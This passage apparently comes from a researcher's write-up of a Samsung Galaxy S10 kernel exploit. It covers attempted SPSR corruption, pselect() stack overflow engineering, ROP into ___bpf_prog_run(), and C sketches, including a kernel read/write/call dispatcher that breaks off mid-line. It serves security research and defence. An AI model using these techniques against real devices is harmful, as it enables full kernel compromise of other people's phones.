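    uint64_t pc;         /* saved ELR_EL1: where exception return resumes */
    uint64_t pstate;     /* saved SPSR_EL1: includes the EL to return to */
};

/* The saved PC is immediately followed by the saved PSTATE/SPSR. */
_Static_assert(offsetof(struct user_pt_regs_mirror, pstate) ==
               offsetof(struct user_pt_regs_mirror, pc) + 8,
               "pc and pstate are adjacent");
```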

When Apple implemented their PAC-based kernel control flow integrity on iOS, they needed to take care that the saved value of SPSR could not be tampered with. The reason is that SPSR is used during exception return to specify the exception level to return to: this could be EL0 when returning to userspace, or EL1 when returning to kernel mode. If SPSR weren't protected, then an attacker with a kernel read/write primitive could modify the saved value of SPSR to cause a thread that would return to userspace (EL0) to instead return to EL1, thereby breaking the kernel's control flow integrity (CFI).

The Samsung Galaxy S10 does not have PAC, and hence SPSR is not protected. This is not a security issue because kernel CFI isn't a security boundary on this device. However, it does mean that this attack could be used to gain kernel code execution.

The idea of targeting the saved SPSR was appealing because we would no longer need the buffer overflow step to execute our ROP payload: assuming we could get an ION buffer allocated with a carefully chosen device address, we could modify SPSR directly using our out-of-bounds addition primitive.

Concretely, when a user thread invokes a syscall, the saved SPSR value might be something like 0x20000000. The least significant 4 bits of SPSR specify the exception level from which the exception was taken and which stack pointer was in use: in this case, EL0. A normal kernel thread might have a CPSR value of 0x80400145; in this case, the "5" means that the thread is running at EL1 using the EL1 stack pointer, SP_EL1 (the EL1h mode).

Now imagine that we could get our 0x01000000-byte ION buffer allocated with a device address of 0x85000000. We'll also assume that we've somehow already managed to set the user thread's saved PC register to a kernel pointer. The saved user PC and SPSR registers look like this on the stack:

          PC            |          SPSR
XX XX XX 0X 80 FF FF FF | 00 00 00 20 00 00 00 00

Using our out-of-bounds addition primitive to change just the least significant byte of SPSR would yield the following:

          PC            |          SPSR
XX XX XX 0X 80 FF FF FF | 85 00 00 20 00 00 00 00

Hence, we would have changed SPSR from 0x20000000 to 0x20000085, meaning that once the syscall returns, we will start executing at EL1!

Of course, that still leaves a few questions open: How do we get our ION buffer allocated at the desired device address? How do we set the saved PC value to a kernel pointer? We'll address these in turn.

Getting the ION buffer allocated at the desired device address seemed the most urgent, since it is quite integral to this technique. In my testing it seemed that ION buffers had decently (but not perfectly) regular allocation patterns. For example, if you had just allocated an ION buffer of size 0x2000 that had device address 0x80500000, then the next ION buffer was usually allocated with device address 0x80610000.

I played around with the available parameters a lot, hoping to discover an underlying logic that would allow me to deterministically predict ION daddrs. For instance, if the size of the first ION allocation was between 0x1000 and 0x10000 bytes, then the next allocation would usually be made at a device address 0x110000 bytes later, while if the first ION allocation was between 0x11000 and 0x20000 bytes, the next allocation would usually be at a device address 0x120000 bytes later. These patterns seemed to suggest that predictability was tantalizingly close; however, try as I might, I couldn't seem to eliminate the variations from the patterns I observed.

Eventually, by sheer random luck I happened to stumble upon a technique during one of my trials that would quite reliably allocate ION buffers at addresses of my choosing. Thus, we can now assume as part of our out-of-bounds addition primitive that we have control to choose the ION buffer's device address. Furthermore, the mask of available ION daddrs using this technique is much larger than I'd initially thought: 0x[89]xxxx000.
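The two empirical observations can be written down as predicates. This encodes only what was reported above: the daddr mask, and the earlier size-dependent strides that held usually but not always. The reliable technique itself isn't described, so it isn't modeled; the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Does daddr fit the 0x[89]xxxx000 pattern observed with the technique? */
int ion_daddr_in_observed_mask(uint32_t daddr)
{
    uint32_t top = daddr & 0xf0000000u;

    return (daddr & 0xfffu) == 0 && (top == 0x80000000u || top == 0x90000000u);
}

/* Usual distance from one ION daddr to the next, given the size of the first
 * allocation, as observed in testing (not a guarantee); 0 if none reported. */
uint32_t ion_typical_next_stride(uint32_t first_size)
{
    assert(first_size > 0);
    if (first_size >= 0x1000 && first_size <= 0x10000)
        return 0x110000;
    if (first_size >= 0x11000 && first_size <= 0x20000)
        return 0x120000;
    return 0;
}
```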

Now, as to the question of how we'll set the saved PC value to a kernel pointer: The simplest approach would just be to jump to that address from userspace; this would work to set the value, but it was not clear to me whether we'd be able to block the thread in the kernel in this state long enough to modify the SPSR using our addition primitive from the main thread. Instead, on recommendation from my team I used the ptrace() API, which via the PTRACE_SETREGSET command provides similar functionality to XNU's thread_set_state().
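For illustration, setting a stopped tracee's PC through the regset interface might look like the sketch below. It assumes arm64 and a tracee that has already been attached (for example with PTRACE_ATTACH or PTRACE_SEIZE) and is in a ptrace-stop. PTRACE_GETREGSET/PTRACE_SETREGSET with NT_PRSTATUS and an iovec is the standard Linux interface; set_tracee_pc() is a hypothetical name, and on other architectures the sketch just fails with ENOSYS.

```c
#include <assert.h>
#include <errno.h>
#include <stdint.h>
#include <sys/types.h>

#if defined(__aarch64__)
#include <elf.h>        /* NT_PRSTATUS */
#include <sys/ptrace.h>
#include <sys/uio.h>    /* struct iovec */
#include <sys/user.h>   /* struct user_regs_struct: regs[31], sp, pc, pstate */
#endif

/* Read the tracee's general registers, replace PC, and write them back.
 * Returns 0 on success, -1 with errno set on failure. */
int set_tracee_pc(pid_t pid, uint64_t new_pc)
{
#if defined(__aarch64__)
    struct user_regs_struct regs;
    struct iovec iov = { .iov_base = &regs, .iov_len = sizeof(regs) };

    if (ptrace(PTRACE_GETREGSET, pid, (void *)NT_PRSTATUS, &iov) == -1)
        return -1;
    assert(iov.iov_len == sizeof(regs));
    regs.pc = new_pc;
    return ptrace(PTRACE_SETREGSET, pid, (void *)NT_PRSTATUS, &iov) == -1 ? -1 : 0;
#else
    (void)pid;
    (void)new_pc;
    errno = ENOSYS;   /* this sketch only targets arm64 */
    return -1;
#endif
}
```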

Total meltdown

My first test after implementing this strategy was to set PC to the address of an instruction that would dereference an invalid memory address. The idea was that running this test should cause a kernel panic right away, since the exception return would start running in kernel mode. Then I could check the panic log to see if all the registers were being set as I expected.

Unfortunately, my first test didn't panic: the syscall whose SPSR was corrupted just seemed to hang, never returning to userspace. And after several seconds of this (during which the phone was fully responsive), the phone would eventually reboot with a message about a watchdog timeout.

This seemed quite bizarre to me. If SPSR wasn't being set properly, the syscall should return to EL0, not EL1, and thus we shouldn't be able to cause any sort of kernel crash. On the other hand, I was certain that PC was set to the address of a faulting instruction, so if SPSR were being set properly, I'd expect a kernel panic, not a hard hang triggering a watchdog timeout. What was going on?

Eventually, Jann and I discovered that this device had the ARM64_UNMAP_KERNEL_AT_EL0 CPU feature (arm64's kernel page-table isolation) enabled, which meant that the faulting instruction I was trying to jump to was no longer mapped by the time the syscall returned. Working around this seemed more trouble than it was worth; instead, I decided to abandon SPSR and go back to looking for ways to trigger a stack buffer overflow.

Revisiting the write (again)

So, once again I was back to finding a way to use the out-of-bounds addition to create a stack buffer overflow.

This was the part of the exploit development process that I was least enthusiastic about: searching through the Linux code to find specific patterns that would give me the primitives I needed. Choosing to focus on stack frames rather than heap objects certainly helped narrow the search space, but it was still tedious. Thus, I decided to focus on the parts of the kernel I'd already grown familiar with.

The pattern that I was looking for was any place that blocks before copying data to the stack, where the amount of data to be copied was stored in a variable that would be saved during the block. Ideally, this would be a call to copy_from_user(), but I failed to find any useful instances of copy_from_user() being called after a blocking operation.

However, a horrible, horrible idea occurred to me while looking once again at the pselect() syscall, and in particular at the implementation of do_select():

static int do_select(int n, fd_set_bits *fds, struct timespec64 *end_time)
{
    ...
    retval = 0;
    for (;;) {
        ...
        inp = fds->in; outp = fds->out; exp = fds->ex;
        rinp = fds->res_in; routp = fds->res_out; rexp = fds->res_ex;
        for (i = 0; i < n; ++rinp, ++routp, ++rexp) {
            ...
            in = *inp++; out = *outp++; ex = *exp++;
            all_bits = in | out | ex;
            if (all_bits == 0) {
                i += BITS_PER_LONG;
                continue;
            }
            for (j = 0; j < BITS_PER_LONG; ++j, ++i, bit <<= 1) {
                struct fd f;
                if (i >= n)
                    break;
                if (!(bit & all_bits))
                    continue;
                f = fdget(i);
                if (f.file) {
                    ...
                    if (f_op->poll) {
                        ...
                        mask = (*f_op->poll)(f.file, wait);
                    }
                    ...
                    if ((mask & POLLIN_SET) && (in & bit)) {
                        res_in |= bit;
                        ...
                    }
                    ...
                }
            }
            if (res_in)
                *rinp = res_in;
            if (res_out)
                *routp = res_out;
            if (res_ex)
                *rexp = res_ex;
            ...
        }
        ...
        if (retval || timed_out || signal_pending(current))
            break;
        ...
        if (!poll_schedule_timeout(&table, TASK_INTERRUPTIBLE,
                       to, slack))
            timed_out = 1;
    }
    ...
    return retval;
}
pselect() is able to check file descriptors for 3 types of readiness: reading (in fds), writing (out fds), and exceptional conditions (ex fds). If none of the file descriptors in the 3 fdsets are ready for the corresponding operations, then do_select() will block in poll_schedule_timeout() until either the timeout expires or the status of one of the selected fds changes.

Imagine what happens if, while do_select() is blocked in poll_schedule_timeout(), we use our out-of-bounds addition primitive to change the value of n. We already know from our analysis of core_sys_select() that if n was sufficiently small to begin with, then the stack_fds array will be used instead of allocating a buffer on the heap. Thus, in, out, and ex may reside on the stack. Once poll_schedule_timeout() unblocks, do_select() will iterate over all file descriptor numbers from 0 to (the corrupted value of) n. Towards the end of this loop, inp, outp, and exp will be read out-of-bounds, while rinp, routp, and rexp will be written out of bounds. Thus, this is actually a stack buffer overflow. And since the values written to rinp, routp, and rexp are determined based on the readiness of file descriptors, we have at least some hope of controlling the data that gets written.

Sizing the overflow

So, in theory, we could target pselect() to create a stack buffer overflow using our out-of-bounds addition. There are still a lot of steps between that general idea and a working exploit.

Let's begin just by trying to understand the situation we're in a bit more precisely. Looking at the function prologues in IDA, we can determine the stack layout after the stack_fds buffer:

A diagram showing the call stack of core_sys_select(). The topmost stack frame is core_sys_select(), followed by SyS_pselect6(), followed by el0_sync_64.

The stack layout of core_sys_select() and all earlier frames in the call stack. The 256-byte stack_fds buffer out of which we will overflow is 0x348 bytes from the end of the stack and followed by a stack guard and return address.

There are two major constraints we're going to run into with this buffer overflow: controlling the length of the overflow and controlling the contents of the overflow. We'll start with the length.

Based on the depth of the stack_fds buffer in the kernel stack, we can only write 0x348 bytes into the buffer before running off the end of the stack and triggering a kernel panic. If we assume a maximal value of n = 0x140 (which will be important when controlling the contents of the overflow), then that means we need to stop processing at inp = 0x348 - 5 * 0x28 = 0x280 bytes into the buffer, which will position rexp just off the end of the stack. This corresponds to a maximum corrupted value of n of 8 * 0x280 = 0x1400.
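The numbers in the previous paragraph can be re-derived in a few lines of C. This is a sketch under the assumptions stated in the text: a 64-bit long, the six fdsets (in, out, ex, res_in, res_out, res_ex) packed back-to-back in the 256-byte stack_fds buffer, and stack_fds sitting 0x348 bytes from the end of the kernel stack. The names fds_bytes, max_stack_n and max_corrupted_n are hypothetical helpers, not kernel functions.

```c
#include <assert.h>
#include <stddef.h>

#define BITS_PER_LONG 64      /* assumption: arm64, 64-bit long */
#define STACK_FDS_BYTES 256   /* size of the on-stack stack_fds buffer */

/* Bytes used by one fdset of n bits, rounded up to whole longs
 * (the same rounding the kernel's FDS_BYTES() performs). */
size_t fds_bytes(size_t n) {
    return (n + BITS_PER_LONG - 1) / BITS_PER_LONG * (BITS_PER_LONG / 8);
}

/* Largest n for which core_sys_select() keeps all six fdsets on the stack,
 * mirroring its `size > sizeof(stack_fds) / 6` fallback-to-heap test. */
size_t max_stack_n(void) {
    size_t n = 0;
    while (fds_bytes(n + 1) <= STACK_FDS_BYTES / 6)
        n++;
    return n;
}

/* The fdsets are spaced fds_bytes(original_n) apart, so rexp (the last
 * output cursor) runs 5 fdsets ahead of inp. Return the corrupted n at
 * which rexp would reach the end of the stack. */
size_t max_corrupted_n(size_t original_n, size_t bytes_to_stack_end) {
    size_t spacing = fds_bytes(original_n);
    assert(bytes_to_stack_end >= 5 * spacing);
    size_t inp_limit = bytes_to_stack_end - 5 * spacing;
    return 8 * inp_limit;   /* 8 fds (bits) per byte of input consumed */
}
```

Under these assumptions, fds_bytes(0x140) gives the 0x28-byte fdset size, max_stack_n() gives 0x140, and max_corrupted_n(0x140, 0x348) gives the 0x1400 limit from the text.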

So, how do we choose an ION buffer daddr such that adding the daddr into n = 0x140 at some offset will yield a value significantly greater than 0x140 but less than 0x1400?

Unfortunately, the math on this doesn't work out. Even if we choose from the expanded range of ION device addresses 0x[89]xxxx000, there is no address that can be added to 0x140 at a particular offset to produce a 32-bit value between 0x400 and 0x1400.
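This claim can be checked exhaustively with a small brute-force search. The sketch assumes the addition primitive adds a 32-bit little-endian daddr at a byte-granular offset, that carries stay inside that 4-byte window, and that the bytes next to n are zero; only offsets -3 through +3 overlap n at all. The function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

static uint32_t load_le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void store_le32(uint8_t *p, uint32_t v) {
    for (int i = 0; i < 4; i++)
        p[i] = (uint8_t)(v >> (8 * i));
}

/* Value of a 32-bit little-endian n after adding `daddr` as a 32-bit value
 * at byte offset `offset` relative to n (carry out of the window is lost). */
uint32_t n_after_add(uint32_t n, uint32_t daddr, int offset) {
    assert(offset >= -3 && offset <= 3);   /* other offsets do not touch n */
    uint8_t mem[10] = {0};                 /* mem[3..6] holds n */
    uint8_t *window = &mem[3 + offset];
    store_le32(&mem[3], n);
    store_le32(window, load_le32(window) + daddr);
    return load_le32(&mem[3]);
}

/* Count (daddr, offset) pairs with daddr in 0x[89]xxxx000 that turn
 * n = 0x140 into a value in [lo, hi). */
unsigned count_single_daddr_solutions(uint32_t lo, uint32_t hi) {
    unsigned count = 0;
    for (uint32_t daddr = 0x80000000u; daddr <= 0x9ffff000u; daddr += 0x1000u)
        for (int offset = -3; offset <= 3; offset++) {
            uint32_t v = n_after_add(0x140, daddr, offset);
            if (v >= lo && v < hi)
                count++;
        }
    return count;
}
```

count_single_daddr_solutions(0x400, 0x1400) tries all 0x20000 candidate daddrs at each of the 7 overlapping offsets and, under these assumptions, finds none. For example, offset -3 only lands the top daddr byte on the low byte of n, giving values between 0x1c0 and 0x1df, while every other offset either leaves n at 0x140 or pushes it far above 0x1400.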

Nevertheless, we do still have another option available to us: 2 ION buffers! If we can choose the device address of a single ION buffer, theoretically we should be able to repeat the feat to choose the device addresses of 2 ION buffers together; can we find a pair of daddrs that can be added to 0x140 at particular offsets to produce a 32-bit value between 0x400 and 0x1400?

It turns out that adding in a second independent daddr now gives us enough degrees of freedom to find a solution. For example, consider the daddrs 0x8qrst000 and 0x8wxyz000 being added into 0x140 at offsets 0 and +1, respectively. Looking at how the bytes align, it's clear that the only sum less than 0x1400 will be 0x1140. Thus, we can derive a series of relations between the digits:

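                        byte0 byte1 byte2 byte3 byte4
carry                                     1     1
n = 0x140               40    01    00    00    00
+ 0x8qrst000 at +0      00    t0    rs    8q
+ 0x8wxyz000 at +1            00    z0    xy    8w
= result                40    11    00    00    ??

(all digits hexadecimal)
byte1:  t = 1
byte2:  s = 0, and z+r = 0 OR z+r = 10
        ASSUME z+r = 10 (carry 1 into byte3)
byte3:  1+y+q = 10 => y+q = f
        1+x+8 = 10 => x = 7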

In this case, we discover that daddrs 0x8qr01000 and 0x8w7yz000 will be a solution so long as q + y = 0xf and r + z = 0x10. For example, 0x81801000 and 0x827e8000 are a solution:

                        byte0 byte1 byte2 byte3 byte4
carry                                     1     1
n = 0x140               40    01    00    00    00
+ 0x81801000 at +0      00    10    80    81
+ 0x827e8000 at +1            00    80    7e    82
= result                40    11    00    00    83

corrupted 32-bit n is 0x1140
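The derived family of solutions can be checked mechanically. This sketch uses the same byte-level model as before (32-bit little-endian additions, carries confined to each 4-byte window, zero bytes after n) and applies daddr1 at offset 0 before daddr2 at offset +1; derived_pair() and the other names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

static uint32_t load_le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void store_le32(uint8_t *p, uint32_t v) {
    for (int i = 0; i < 4; i++)
        p[i] = (uint8_t)(v >> (8 * i));
}

/* n after adding daddr1 at byte offset 0 and then daddr2 at byte offset +1. */
uint32_t n_after_two_adds(uint32_t n, uint32_t daddr1, uint32_t daddr2) {
    uint8_t mem[8] = {0};   /* mem[0..3] = n, mem[4..7] = following bytes */
    store_le32(&mem[0], n);
    store_le32(&mem[0], load_le32(&mem[0]) + daddr1);
    store_le32(&mem[1], load_le32(&mem[1]) + daddr2);
    return load_le32(&mem[0]);
}

/* Build 0x8qr01000 and 0x8w7yz000 with y = 0xf - q and z = 0x10 - r. */
void derived_pair(uint32_t q, uint32_t r, uint32_t w, uint32_t *d1, uint32_t *d2) {
    assert(q <= 0xf && r >= 1 && r <= 0xf && w <= 0xf);
    uint32_t y = 0xf - q, z = 0x10 - r;
    *d1 = 0x80001000u | q << 24 | r << 20;
    *d2 = 0x80700000u | w << 24 | y << 16 | z << 12;
}

/* Returns 1 if every pair in the derived family corrupts 0x140 to 0x1140. */
int family_all_yield_0x1140(void) {
    for (uint32_t q = 0; q <= 0xf; q++)
        for (uint32_t r = 1; r <= 0xf; r++)
            for (uint32_t w = 0; w <= 0xf; w++) {
                uint32_t d1, d2;
                derived_pair(q, r, w, &d1, &d2);
                if (n_after_two_adds(0x140, d1, d2) != 0x1140)
                    return 0;
            }
    return 1;
}
```

derived_pair(1, 8, 2, ...) reproduces the example pair 0x81801000 and 0x827e8000, and family_all_yield_0x1140() checks all 3840 members of the family in one go.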

So, we'll need to tweak our original heap groom slightly to map both ION buffers back-to-back before spraying the kernel thread stacks.

Controlling the contents

Using 2 ION buffers with carefully chosen device addresses allows us to control the size of the stack buffer overflow. Meanwhile, the contents of the overflow are the output of the pselect() syscall, which we can control because we can control which file descriptors in our process are ready for various types of operations. But once we overflow past the original value of n, we run into a problem: we start reading our input data from the data previously written to the output buffer.

A diagram showing the progression of the stack buffer overflow out of the stack_fds buffer and down the stack.

Corrupting the value of n will cause do_select() to keep processing inp, outp, and exp past their original bounds. Eventually the output cursor rinp will start overflowing out of the stack_fds buffer entirely, overwriting the return address. But before that happens, inp will start consuming the previous output of rinp.

To make the analysis simpler, we can ignore out, ex, rout, and rex to focus exclusively on in and rin. The reason for this is that rout and rex will eventually be overwritten by rin, so it doesn't really matter what they write; if the overflow continues for a sufficient distance, only the output of rin matters.

Using the assumed value of n = 0x140, each of the in, out, ex, rin, rout, rex buffers is 0x28 bytes, so after processing 3 * n = 0x3c0 file descriptors, inp (the input pointer) will start reading from rin (the output buffer), and this will continue as the out-of-bounds write progresses down the stack. By the semantics of select(), each bit in rinp is only written with a 1 if both the corresponding bit in inp was a 1 and the corresponding file descriptor was readable. Thus, once we've written a 0 bit at any location, every bit at a multiple of 0x3c0 bits later will also be 0. This introduces a natural cycle in our overflow that constrains the output.

It's also worth noting that if you look back at do_select(), rinp is only written if the full 64-bit value to write is nonzero. Thus, if any 64-bit output value is 0 (i.e., all 64 fds in the long are either not selected on or not readable), then the corresponding stack location will be left intact.

A diagram showing the cyclical dependency of bit values that can be written using this buffer overflow. In order to set bit X to 1, we need to ensure that bit X - 0x3c0 is also 1 and that file descriptor X - 0x3c0 is readable. If X - 0x3c0 is 0, then do_select() will not select on file descriptor X - 0x3c0, and the output at X will be 0; however, if all 64 output bits in X's long are 0, then no output is written and the value of X will be unchanged.

Because of the 3 * 0x28 = 0x78-byte cycle length, we can treat this primitive as the ability to write up to 15 controlled 64-bit values into the stack, each at a unique offset modulo 0x78, while leaving stack values at the remaining offsets modulo 0x78 intact. This is a conservative simplification, since our primitive is somewhat more flexible than this, but it's useful to visualize our primitive this way.

Under this simplification, we can describe the out-of-bounds write as 15 (offset, value) pairs, where offset is the offset from the start of the stack_fds array in bytes (which must be a multiple of 8 and must be unique mod 0x78) and value is the 64-bit value to be written at that offset. For each (offset, value) pair, we need to set to 1 every bit in each "preimage" of value from an earlier cycle.

To simplify things even further, let's regard the concatenation of the input fdsets in, out, and ex as a single input fdset, just as it appears on the kernel stack in the stack_fds buffer once we've corrupted n.

The simplest solution is to have the "preimage" of each value be value itself, which can be done by setting the portion of the input fdset at offset % 0x78 to value for each (offset, value) pair and by making every file descriptor from 0 to 0x1140 be readable. Since we'll only be selecting on the fds that correspond to 1 bits in value and since every fd is readable, this will mirror the entire input buffer (consisting of the 15 values at their corresponding offsets) down the kernel stack repeatedly. This will trivially ensure that value gets placed at offset because value will be written to every offset in the kernel stack that is the same as offset mod 0x78.
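The mirroring behaviour can be reproduced with a toy model of the corrupted loop. This is a simplified sketch, not the kernel code: it assumes the original n = 0x140 (so the cycle is 15 longs), tracks only in and res_in as the analysis above suggests, and represents the kernel stack from stack_fds onward as an array of 64-bit longs. simulate_overflow and CYCLE_LONGS are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* For an original n of 0x140, in, out and ex are 5 longs each, so a long
 * written through rinp is read back as input 15 longs (0x78 bytes) later. */
#define CYCLE_LONGS 15

/* Toy model of the corrupted do_select() loop restricted to in -> res_in.
 * mem[0] is the start of stack_fds; readable[k] is the readability of
 * fds 64k..64k+63. As in do_select(), an all-zero result is not stored.
 * The caller must provide at least chunks + CYCLE_LONGS longs in mem. */
void simulate_overflow(uint64_t *mem, const uint64_t *readable, size_t chunks) {
    assert(mem != NULL && readable != NULL);
    for (size_t k = 0; k < chunks; k++) {
        uint64_t res_in = mem[k] & readable[k];
        if (res_in)
            mem[k + CYCLE_LONGS] = res_in;
    }
}
```

With every fd readable and a corrupted n of 0x1140 (69 chunks of 64 fds), the 15 nonzero input longs reappear every 15 longs down the array, and nothing beyond the last chunk's output slot is touched.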

A diagram showing the input buffer being repeatedly mirrored down the stack.

By making all of the first 0x1140 file descriptors readable, the input buffer's 15 longs will be mirrored down the stack, repeating every 0x3c0 bits.

Using a slightly more complicated solution, however, we can limit the depth of the stack corruption. Instead, we'll have the preimage of each value be ~0 (i.e., all 64 bits set), and use the readability of each file descriptor to control the bits that get written. That way, once we've written the value at the correct offset, the fds corresponding to subsequent cycles can be made non-readable, thereby preventing the corruption from continuing down the stack past the desired depth of each write.
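The depth-limited variant differs only in how readability is assigned. This hypothetical sketch reuses the same toy model (original n = 0x140, a 15-long cycle, only in and res_in tracked) and adds plan_write(), an illustrative helper that builds per-chunk readability masks. In those masks, every fd in earlier cycles is readable so the all-ones preimage propagates, the last cycle's readability spells out the target value, and later cycles are unreadable so nothing more is written in that column.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define CYCLE_LONGS 15   /* in + out + ex for an original n of 0x140 */

/* Toy model of the corrupted do_select() loop (in -> res_in only). */
void simulate_overflow(uint64_t *mem, const uint64_t *readable, size_t chunks) {
    for (size_t k = 0; k < chunks; k++) {
        uint64_t res_in = mem[k] & readable[k];
        if (res_in)                      /* all-zero results are not stored */
            mem[k + CYCLE_LONGS] = res_in;
    }
}

/* Fill readability masks so that, with an all-ones input long at
 * target % CYCLE_LONGS, the chain writes `value` at long index `target`
 * and stops there. Masks for other columns are left as the caller set them. */
void plan_write(uint64_t *readable, size_t chunks, size_t target, uint64_t value) {
    assert(target >= CYCLE_LONGS && target - CYCLE_LONGS < chunks);
    for (size_t k = target % CYCLE_LONGS; k < chunks; k += CYCLE_LONGS) {
        if (k + CYCLE_LONGS < target)
            readable[k] = ~UINT64_C(0);   /* keep propagating all ones */
        else if (k + CYCLE_LONGS == target)
            readable[k] = value;          /* last hop: only value's 1 bits */
        else
            readable[k] = 0;              /* past the target: stop */
    }
}
```

Because an all-zero result long is never stored, columns whose input long is 0 keep their original stack contents, and the slot one cycle below the target is left untouched as well. Calling plan_write() once per (offset, value) pair, each in a distinct column, gives the up-to-15-write primitive described above.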

This still leaves one more question about the mechanics of the stack buffer overflow: poll_schedule_timeout() will return as soon as any file descriptor becomes readable, so how can we make sure that all the fds for all the 1 bits become readable at the same time? Fortunately this has an easy solution: create 2 pipes, one for all 0 bits and one for all 1 bits, and use dup2() to make all the fds we'll be selecting on be duplicates of the read ends of these pipes. Writing data to the "1 bits" pipe will cause poll_schedule_timeout() to unblock and all the "1 bits" fds will be readable (since they're all dups of the same underlying file). The only thing we need to be careful about is to ensure that at least one of the original in file descriptors (fds 0-0x13f) is a "1 bit" dup, or else poll_schedule_timeout() won't notice the status change when we write to the "1 bits" pipe.
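The two-pipe trick can be tried from userspace without any kernel bug. This POSIX sketch dups the read end of a "1 bits" pipe or a "0 bits" pipe onto eight consecutive fds according to a bit pattern, writes one byte to the "1 bits" pipe, and reads back which fds select() reports as readable. The function name, the fd base and the 8-fd width are illustrative choices; the exploit itself used fds up to 0x1140 and wrote to the pipe while pselect() was already blocked.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <stddef.h>
#include <sys/select.h>
#include <unistd.h>

/* Dup the read end of a "1 bits" or "0 bits" pipe onto fds base..base+7
 * according to `pattern`, make the "1 bits" pipe readable, and return the
 * bit mask of fds that select() reports as readable (or -1 on error). */
int readable_pattern_demo(int base, unsigned pattern) {
    int zero_pipe[2], one_pipe[2];
    assert(base > 2 && base + 8 <= FD_SETSIZE);
    if (pipe(zero_pipe) != 0)
        return -1;
    if (pipe(one_pipe) != 0) {
        close(zero_pipe[0]);
        close(zero_pipe[1]);
        return -1;
    }

    fd_set in;
    FD_ZERO(&in);
    for (int bit = 0; bit < 8; bit++) {
        int src = ((pattern >> bit) & 1u) ? one_pipe[0] : zero_pipe[0];
        dup2(src, base + bit);   /* each dup shares its pipe's readiness */
        FD_SET(base + bit, &in);
    }

    /* One write makes every "1 bits" dup readable at once. Here it happens
     * before select(); in the exploit it arrives while the call is blocked. */
    int result = -1;
    if (write(one_pipe[1], "x", 1) == 1) {
        struct timeval timeout = { 1, 0 };
        if (select(base + 8, &in, NULL, NULL, &timeout) >= 0) {
            result = 0;
            for (int bit = 0; bit < 8; bit++)
                if (FD_ISSET(base + bit, &in))
                    result |= 1 << bit;
        }
    }

    for (int bit = 0; bit < 8; bit++)
        close(base + bit);
    close(zero_pipe[0]);
    close(zero_pipe[1]);
    close(one_pipe[0]);
    close(one_pipe[1]);
    return result;
}
```

For example, readable_pattern_demo(100, 0xb2) reports exactly the fds whose pattern bit is 1, because all of them refer to the same open pipe description.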

Combining all of these ideas together, we can finally control the contents of the buffer overflow, clobbering the return address (while leaving the stack guard intact!) to execute a small ROP payload.

The ultimate ROP

Finally, it's time to consider our ROP payload. Because we can write at most 15 distinct 64-bit values into the stack via our overflow (2 of which we've already used), we'll need to be careful about keeping the ROP payload small.

When I mentioned this progress to Jann, he suggested that I check the function ___bpf_prog_run(), which he described as the ultimate ROP gadget. And indeed, if your kernel has it compiled in, it does appear to be the ultimate ROP gadget!

___bpf_prog_run() is responsible for interpreting eBPF bytecode that has already been deemed safe by the eBPF verifier. As such, it provides a number of very powerful primitives, including:

  1. arbitrary control flow in the eBPF program;
  2. arbitrary memory load;
  3. arbitrary memory store;
  4. arbitrary kernel function calls with up to 5 arguments and a 64-bit return value.

So how can we start executing this function with a controlled instruction array as quickly as possible?

First, it's slightly easier to enter ___bpf_prog_run() through one of its wrappers, such as __bpf_prog_run32(). The wrapper takes just 2 arguments rather than 3, and of those, we only need to control the second:

unsigned int __bpf_prog_run32(const void *ctx, const struct bpf_insn *insn)

The insn argument is passed in register X1, which means we'll need to find a ROP gadget that will pop a value off the stack and move it into X1. Fortunately, the following gadget from the end of the current_time() function gives us control of X1 indirectly via X20:

FFFFFF8008294C20     LDP     X29, X30, [SP,#0x10+var_s0]
FFFFFF8008294C24     MOV     X0, X19
FFFFFF8008294C28     MOV     X1, X20
FFFFFF8008294C2C     LDP     X20, X19, [SP+0x10+var_10],#0x20
FFFFFF8008294C30     RET

The reason this works is that X20 was actually popped off the stack during the epilogue of core_sys_select(), which means that we already have control over X20 by the time we execute the first hijacked return. So executing this gadget will move the value we popped into X20 over to register X1. And since this gadget reads its return address from the stack, we'll also have control over where we return to next, meaning that we can jump right into __bpf_prog_run32() with our controlled X1.

The only remaining question is what value to place in X1. Fortunately, this also has a very simple answer: the ION buffers are mapped shared between userspace and the kernel, and we already disclosed their location when we leaked the uninitialized stack_fds buffer contents before. Thus, we can just write our eBPF program into the ION buffer and pass that address to __bpf_prog_run32()!

For simplicity, I had the eBPF implement a busy-poll of the shared memory to execute commands on behalf of the userspace process. The eBPF program would repeatedly read a value from the ION buffer and perform either a 64-bit read, 64-bit write, or 5-argument function call based on the value that was read. This gives us an incredibly simple and reliable kernel read/write/execute primitive.
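The command loop can be pictured as a small shared-memory mailbox. The sketch below is a plain-C model of that dispatch, not the author's eBPF program: the struct layout, the opcode values and service_one() are hypothetical, and in the real exploit the dispatch ran as eBPF bytecode inside ___bpf_prog_run(), polling the ION buffer in a loop.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical opcodes for the shared command slot. */
enum { CMD_IDLE = 0, CMD_READ64 = 1, CMD_WRITE64 = 2, CMD_CALL5 = 3, CMD_DONE = 4 };

/* Hypothetical layout of the command slot in the shared buffer. */
struct shared_cmd {
    volatile uint64_t op;   /* set last by the requester, CMD_DONE when serviced */
    uint64_t addr;          /* address to read/write, or function to call */
    uint64_t value;         /* value for CMD_WRITE64 */
    uint64_t args[5];       /* arguments for CMD_CALL5 */
    uint64_t result;        /* result of CMD_READ64 or CMD_CALL5 */
};

typedef uint64_t (*call5_fn)(uint64_t, uint64_t, uint64_t, uint64_t, uint64_t);

/* One poll of the command slot: perform the requested operation, if any,
 * and mark it done. Returns 1 if a command was serviced, 0 otherwise. */
int service_one(struct shared_cmd *c) {
    assert(c != NULL);
    switch (c->op) {
    case CMD_READ64:
        c->result = *(volatile uint64_t *)(uintptr_t)c->addr;
        break;
    case CMD_WRITE64:
        *(volatile uint64_t *)(uintptr_t)c->addr = c->value;
        break;
    case CMD_CALL5:
        c->result = ((call5_fn)(uintptr_t)c->addr)(c->args[0], c->args[1],
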